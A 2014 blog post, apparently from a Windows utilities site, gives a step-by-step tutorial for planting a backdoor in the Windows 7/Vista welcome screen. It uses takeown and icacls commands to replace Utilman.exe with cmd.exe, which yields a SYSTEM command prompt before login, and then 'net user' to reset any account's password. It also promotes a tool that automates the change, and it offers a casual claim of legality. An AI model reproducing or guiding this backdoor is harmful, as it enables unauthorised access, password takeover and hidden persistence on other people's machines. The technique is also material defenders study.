Sunday, December 14, 2014

Hidden Backdoor in Windows 7/Vista Welcome Screen

Ok, This is fun. Anyone of you watch the famous 1995 movie "The Net" by Sandra Bullock? The Famous Praetorian PI was used as a backdoor to access password-protected sites. Can we create a vista backdoor, something like that in Windows Vista or 7? Yes you Can! How?
The Clue: The Ease of Access Program

Where? The 624kb Utilman.exe is the key located at System Folder.
Open the Folder Windows\System32\ and check the Properties of Utilman.exe
Problem... My current Logon Username Lawrence and Administrators has no Permission no modify the file. Thus, If you try to rename the file, it will give you the message:
Destination Folder Access is Denied You need permission to perform this action
Normally, Winbubble Context Menu "Take the Ownership of this file" can add the permission but this time, you can't. (The Next Version can do it easily).
Also, Most of the Buttons are Disabled.
How to Add the permission
Prevention is better than Cure: To easily recover your system from any problems, Create a Restore Point First using the Context Menu that can be created by WinBubbles, Read here or you can do it manually: Win+R > rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,4 > Create Button > Enter the name
1. Take the Ownership Of the File using the LONG METHOD, Click here and Right-Click the file > Properties > Go to Security Tab > To change Permission Click Edit Button > Click Administrator > Click to Check Allow Setting of Full Control option box
Another Way because I understand that your a Geek:
Open Command Prompt as Administrator, Start Search > type CMD > Press CTRL+ALT+Enter > Enter the Following commands:
a. takeown /f "Directory\File"

e.g. takeown /f "c:\windows\system32\Utilman.exe"

b. icacls "Directory\File" /grant administrators:F


icacls "c:\windows\system32\Utilman.exe" /grant administrators:F
If you didn't open CMD.exe as administrator, you'll get this message:
ERROR: The current logged on user does not have ownership privileges on the file (or folder) "c:\windows\system32\Utilman.exe" 
2. Rename Utilman.exe to any for backup example: Utilman_old.exe
3. Create a copy of cmd.exe (CTRL+Drag)
4. Rename the Copy - cmd to Utilman
That's It!
Go to your Welcome Screen: Start Menu > At the Bottom, Click the Right Arrow > Switch User
5. Click the Blue Magic Button pointed by the arrow as shown in the first Picture above.
You have now successfully launch a Command Prompt in Administrator mode with UAC disabled...
Doesn't Work? Possible Mistake: In your Folder Option Window > View Tab > "If Hide extensions for known file types" is checked, Don't rename it to "Utilman.exe", use "Utilman" ONLY.
NEW! Using the newest version of WinBubble, you can easily get this functionality in just few clicks!
Click the Windows 7/Utilities Tab, Logon Tools option
Click Yes and Restart your PC. Works great in Windows 7 32/64 bit version!
NOTE: You need to re-open again the program after restarting your computer and repeat the procedure again to be able to activate the feature.
SWEET!!! Start Hacking your own computer :)
Now, it's fine for me to forget my password without creating a password reset disk or by hacking and clearing Vista Password using a Linux OS. Create a Backdoor instead! Is this bad? Of course, this is bad if you'll use it that way.
Net user [Username] [NewPassword]
For more Information, Read Here
Is this legal? Yes, it is... My steps needs the Administrator login to create a backdoor and If you do this by using another OS like Linux to another computer. That's the time it will became Illegal.
Type: whoami /all |more
Now we can see that System logon is the one running when you input Username and Password in the Welcome Screen.
Try typing taskmgr.exe (Browse Button let's you run a mini-windows explorer), Notepad and even Explorer.exe!
In my observations:
  • Windows Firewall is ON (Great!)
  • Spyware and other Malware Protection is ON (Great!)
  • User Account Control is OFF
  • You can browse the Internet
  • The Location of Desktop: c:\Windows\System32\config\systemprofile\Desktop
  • Launch Windows Media Player, Windows Calendar, Windows Mail and many more
Note: There is a possibility that the guide above will work in latest build (RC version) of Windows 7. Due to License and some legal concerns I can't reveal any data. Tell me?


Post a Comment